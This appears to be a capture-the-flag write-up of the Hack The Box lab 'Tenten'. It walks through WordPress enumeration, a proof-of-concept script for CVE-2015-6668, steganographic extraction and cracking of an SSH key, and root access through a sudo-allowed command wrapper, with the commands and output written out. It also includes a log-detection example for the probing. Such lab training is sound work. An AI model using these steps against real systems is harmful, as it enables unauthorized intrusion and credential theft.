Today we are going to solve another CTF challenge, “Tenten”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Tenten is a retired vulnerable lab presented by Hack The Box for online penetration-testing practice matched to your experience level; they have a collection of vulnerable labs as challenges ranging from beginner to expert level.
Level: Medium
Task: find user.txt and root.txt file in the victim’s machine.
Since these labs are available online they have static IPs; the IP of Tenten is 10.10.10.10, so let’s begin with nmap port enumeration.
root@kali:~/htb/tenten# nmap -sC 10.10.10.10
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 20:21 CET
Nmap scan report for 10.10.10.10
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http
|_http-generator: WordPress 4.7.3
|_http-title: Job Portal – Just another WordPress site

Nmap done: 1 IP address (1 host up) scanned in 24.11 seconds
Knowing that port 80 is open on the victim, we opened its IP in the browser; the page shows that it is a WordPress website.
We then ran wpscan against the URL we had entered in the browser, to check for vulnerable themes, plugins and the like, and to enumerate users.
root@kali:~/htb/tenten# wpscan --url http://10.10.10.10/ --enumerate u
[+] URL: http://10.10.10.10/
[+] Started: Mon Feb 11 20:32:12 2019
--snip--
[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:00 <==================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] takis
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Finished: Mon Feb 11 20:32:17 2019
[+] Requests Done: 2
[+] Cached Requests: 54
[+] Data Sent: 497 B
[+] Data Received: 4.543 KB
[+] Memory used: 13.867 MB
[+] Elapsed time: 00:00:04
root@kali:~/htb/tenten# wpscan --url http://10.10.10.10/ --enumerate p
[+] Enumerating Most Popular Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] job-manager
 | Location: http://10.10.10.10/wp-content/plugins/job-manager/
 | Latest Version: 0.7.25 (up to date)
 | Last Updated: 2015-08-25T22:44:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8167
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
 |      - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
 |
 | Version: 7.2.5 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt

[+] Finished: Mon Feb 11 20:35:50 2019
[+] Requests Done: 31
[+] Cached Requests: 3
[+] Data Sent: 6.433 KB
[+] Data Received: 326.415 KB
[+] Memory used: 66.34 MB
[+] Elapsed time: 00:00:07
The job-manager plugin is affected by CVE-2015-6668, an insecure direct object reference that discloses the location of uploaded CVs.
Visit http://10.10.10.10/index.php/, click on Job Listing and then on Apply. In the address bar you’ll see that the URL is http://10.10.10.10/index.php/jobs/apply/8/
There is a number at the end of the URL: it is a post ID from the WordPress MySQL database.
Let’s fuzz that ID to find more pages:
root@kali:~/htb/tenten# for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! – Job Portal</title>
2: <title>Job Application: Sample Page – Job Portal</title>
3: <title>Job Application: Auto Draft – Job Portal</title>
4: <title>Job Application – Job Portal</title>
5: <title>Job Application: Jobs Listing – Job Portal</title>
6: <title>Job Application: Job Application – Job Portal</title>
7: <title>Job Application: Register – Job Portal</title>
8: <title>Job Application: Pen Tester – Job Portal</title>
9: <title>Job Application: – Job Portal</title>
10: <title>Job Application: Application – Job Portal</title>
11: <title>Job Application: cube – Job Portal</title>
12: <title>Job Application: Application – Job Portal</title>
13: <title>Job Application: HackerAccessGranted – Job Portal</title>
14: <title>Job Application – Job Portal</title>
15: <title>Job Application – Job Portal</title>
16: <title>Job Application – Job Portal</title>
17: <title>Job Application – Job Portal</title>
18: <title>Job Application – Job Portal</title>
19: <title>Job Application – Job Portal</title>
20: <title>Job Application – Job Portal</title>
The title on line 13, HackerAccessGranted, looks interesting.
According to the CVE write-up, WordPress stores uploaded files under the predictable path /wp-content/uploads/%year%/%month%/%filename%, and the plugin does not prevent anyone from fetching an uploaded CV directly (the insecure direct object reference that wpscan reported). Knowing the filename is therefore enough: the full URL can be found by trying every year and month folder.
The proof-of-concept script below (written by Evangelos Mourikis, as its header states) does exactly that to find the exact file location:
c:\PENTEST>type CVE-2015-6668.py
import requests

print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""

website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')
# WordPress replaces spaces in an uploaded file's name with hyphens
filename2 = filename.replace(" ", "-")

# Uploads live under /wp-content/uploads/YYYY/MM/, so try every year and
# month folder with each of the image extensions the script knows about
for year in range(2013,2018):
    for i in range(1,13):
        for extension in {'jpg','jpeg','png'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL
c:\PENTEST>python CVE-2015-6668.py

CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
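From the defender's side, the script above leaves a distinctive trail: one client requesting the same filename under dozens of different /wp-content/uploads/YYYY/MM/ folders and collecting 404s until one request succeeds. The following Python is an added detection example, not part of the original walkthrough; it runs over constructed access-log lines shaped like that probing, and the threshold and log format are assumptions.

```python
import re
from collections import defaultdict

# Constructed combined-format access log lines (not real logs from the box), shaped
# like the year/month probing the CVE-2015-6668 script above generates.
SAMPLE_LOG = """\
10.10.14.21 - - [11/Feb/2019:20:40:01 +0100] "GET /wp-content/uploads/2013/01/HackerAccessGranted.jpg HTTP/1.1" 404 245
10.10.14.21 - - [11/Feb/2019:20:40:01 +0100] "GET /wp-content/uploads/2013/02/HackerAccessGranted.jpg HTTP/1.1" 404 245
10.10.14.21 - - [11/Feb/2019:20:40:01 +0100] "GET /wp-content/uploads/2013/03/HackerAccessGranted.png HTTP/1.1" 404 245
10.10.14.21 - - [11/Feb/2019:20:40:02 +0100] "GET /wp-content/uploads/2014/01/HackerAccessGranted.jpeg HTTP/1.1" 404 245
10.10.14.21 - - [11/Feb/2019:20:40:02 +0100] "GET /wp-content/uploads/2015/06/HackerAccessGranted.jpg HTTP/1.1" 404 245
10.10.14.21 - - [11/Feb/2019:20:40:02 +0100] "GET /wp-content/uploads/2016/12/HackerAccessGranted.png HTTP/1.1" 404 245
10.10.14.21 - - [11/Feb/2019:20:40:03 +0100] "GET /wp-content/uploads/2017/04/HackerAccessGranted.jpg HTTP/1.1" 200 262408
192.0.2.7 - - [11/Feb/2019:20:41:00 +0100] "GET /wp-content/uploads/2017/04/site-logo.png HTTP/1.1" 200 1024
192.0.2.7 - - [11/Feb/2019:20:41:01 +0100] "GET /wp-content/uploads/2017/03/old-banner.png HTTP/1.1" 404 245
"""

# Only requests into the dated uploads tree matter here; every other line is skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ '
    r'/wp-content/uploads/(?P<year>\d{4})/(?P<month>\d{2})/(?P<name>[^/"]+?)\.(?P<ext>\w+) '
    r'\S+" (?P<status>\d{3}) '
)


def find_cv_probing(log_text, min_misses=5):
    """Return {(client_ip, basename): (distinct_folders_404d, first_200_path_or_None)}
    for clients that asked for the same basename under many year/month folders.
    A visitor following links rarely 404s; guessing an upload's date does, repeatedly."""
    misses = defaultdict(set)   # (ip, basename) -> set of (year, month) that returned 404
    hits = {}                   # (ip, basename) -> first path that returned 200
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["name"].lower())
        if m["status"] == "404":
            misses[key].add((m["year"], m["month"]))
        elif m["status"] == "200" and key not in hits:
            hits[key] = "/wp-content/uploads/%s/%s/%s.%s" % (m["year"], m["month"], m["name"], m["ext"])
    return {k: (len(v), hits.get(k)) for k, v in misses.items() if len(v) >= min_misses}


if __name__ == "__main__":
    for (ip, name), (n, hit) in find_cv_probing(SAMPLE_LOG).items():
        print("%s probed %d dated folders for '%s'; %s" % (ip, n, name, "retrieved " + hit if hit else "no hit"))
```

The same check applies to the sequential /jobs/apply/N/ requests shown earlier: a single client walking an ID range is the pattern to alert on, whatever the path.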
Next, visit http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg and download the image:
root@kali:~/htb/tenten# wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2019-02-11 20:46:19--  http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’

HackerAccessGranted.jpg   100%[===============================>] 256.26K  1.11MB/s    in 0.2s

2019-02-11 20:46:20 (1.11 MB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
Use steghide to extract the hidden data; the passphrase is empty, so just press Enter at the prompt:
root@kali:~/htb/tenten# steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
root@kali:~/htb/tenten# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
-----END RSA PRIVATE KEY-----
The key is passphrase-protected, so use sshng2john.py to convert it into a hash that John the Ripper can work on:
https://github.com/truongkma/ctf-tools/blob/master/John/run/sshng2john.py
root@kali:~/htb/tenten# python sshng2john.py id_rsa > id_rsa.encrypted
root@kali:~/htb/tenten# ls
id_rsa id_rsa.encrypted
Use john with the rockyou wordlist to recover the passphrase:
root@kali:~/htb/tenten# john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
1g 0:00:00:30 DONE (2019-02-11 20:56) 0.03305g/s 474168p/s 474168c/s 474168C/s *7¡Vamos!
Session completed
SSH in as takis (the user wpscan identified) with the key and the recovered passphrase:
root@kali:~/htb/tenten# chmod 600 id_rsa
root@kali:~/htb/tenten# ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa': superpassword
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.

Last login: Mon Feb 11 21:56:45 2019 from 10.10.14.21
takis@tenten:~$ cat user.txt
e5c*****f31
takis@tenten:~$ strings /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
takis@tenten:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)
takis@tenten:~$ sudo fuckin cat /root/root.txt
f9f*****603
/bin/fuckin is a bash wrapper that simply executes whatever arguments it is given, and takis is allowed to run it with sudo, so any command passed to it runs as root; that is what yields root.txt.
Author : Jacco Straathof